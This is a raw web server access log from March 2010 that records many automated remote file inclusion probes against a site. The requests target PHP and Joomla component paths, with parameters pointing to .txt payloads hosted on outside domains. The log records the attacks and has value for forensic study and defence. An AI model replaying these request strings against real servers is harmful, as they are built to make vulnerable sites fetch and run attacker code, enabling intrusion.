173.212.202.130 - - [04/Mar/2010:04:59:10 -0800] "GET /logs/access_100201.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:05:00:49 -0800] "GET /logs/access_100207.log/template.php?showpage=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:05:00:49 -0800] "GET /logs/template.php?showpage=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:05:00:49 -0800] "GET /template.php?showpage=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:05:02:17 -0800] "GET /logs/access_100210.log/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:05:02:38 -0800] "GET /logs/access_100202.log/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:05:02:46 -0800] "GET /logs/access_100126.log/template.php?showpage=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:05:05:46 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:05:05:46 -0800] "GET /logs/access_100208.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:05:05:46 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:05:07:28 -0800] "GET /logs/access_100224.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:07:33 -0800] "GET /logs/access_100224.log//?path%5Bdocroot%5D=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:07:33 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:07:34 -0800] "GET /?path%5Bdocroot%5D=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:12:02 -0800] "GET /logs/access_100224.log%20%20//?path%5Bdocroot%5D=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:05:12:30 -0800] "GET /template.php?showpage=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:05:12:30 -0800] "GET /logs/template.php?showpage=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:05:12:30 -0800] "GET /logs/access_100207.log%20%20/template.php?showpage=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [04/Mar/2010:05:12:35 -0800] "GET /logs/access_100126.log%20%20/template.php?showpage=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:13:42 -0800] "GET /logs/access_100209.log//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:13:42 -0800] "GET /logs//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:13:43 -0800] "GET /index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:13:44 -0800] "GET /logs/access_100209.log//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:13:44 -0800] "GET /logs//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:13:44 -0800] "GET /index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:14:08 -0800] "GET /logs/access_100209.log//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:14:08 -0800] "GET /logs//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:14:09 -0800] "GET /index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:14:28 -0800] "GET /logs/access_100203.log//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:05:14:34 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:05:14:34 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:05:14:34 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:14:51 -0800] "GET /logs/access_100203.log//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:14:58 -0800] "GET /logs/access_100203.log//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:15:30 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:05:16:25 -0800] "GET /logs/access_100209.log//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:05:16:25 -0800] "GET /index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:05:16:28 -0800] "GET /logs//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:05:17:08 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:05:17:08 -0800] "GET /logs/access_100130.log%20%20//inc/header.php/step_one.php?server_inc=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:05:17:08 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:05:17:30 -0800] "GET /logs/access_100203.log//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:05:17:42 -0800] "GET /logs/access_100208.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [04/Mar/2010:05:18:16 -0800] "GET /logs/access_100224.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:19:13 -0800] "GET /logs/access_100209.log%20%20//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:19:13 -0800] "GET /logs/access_100203.log%20%20//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:20:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:20:07 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:20:07 -0800] "GET /logs/access_100131.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:20:12 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:20:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:20:12 -0800] "GET /logs/access_100131.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:05:22:27 -0800] "GET /logs/access_100209.log%20%20//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:05:22:29 -0800] "GET /logs/access_100203.log%20%20//index.php?option=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:23:41 -0800] "GET /logs/access_100203.log%20%20//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:23:44 -0800] "GET /logs/access_100209.log%20%20//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:05:23:57 -0800] "GET /logs/access_100226.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:05:23:58 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:05:23:59 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [04/Mar/2010:05:24:00 -0800] "GET /logs/access_100203.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:24:37 -0800] "GET /logs/access_100209.log%20%20//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:26:31 -0800] "GET /logs/access_100203.log%20%20//index.php?option=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:05:27:20 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:05:27:20 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:05:27:20 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:05:27:24 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:05:27:35 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:05:27:35 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:05:27:35 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:05:27:35 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:05:29:30 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:05:29:30 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:05:29:30 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:05:29:30 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:05:29:35 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:05:29:36 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:29:54 -0800] "GET /logs//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:29:54 -0800] "GET /admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:29:54 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:29:55 -0800] "GET /admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:29:55 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:29:55 -0800] "GET /logs//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:37 -0800] "GET /admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:38 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:38 -0800] "GET /admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:38 -0800] "GET /logs//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:38 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:39 -0800] "GET /logs//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:43 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:55 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:30:58 -0800] "GET /admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:31:00 -0800] "GET /logs//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:31:00 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:31:01 -0800] "GET /admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:31:01 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:31:02 -0800] "GET /logs//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:31:04 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:31:05 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:05:31:21 -0800] "GET /phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:05:31:21 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:05:31:21 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:32:01 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:32:04 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:32:49 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:32:49 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:32:49 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:33:27 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:33:33 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:33:33 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:33:33 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:34:01 -0800] "GET /logs//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:34:01 -0800] "GET /admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:34:01 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:34:15 -0800] "GET /admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:34:15 -0800] "GET /logs//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:34:15 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:34:15 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:34:16 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:34:17 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
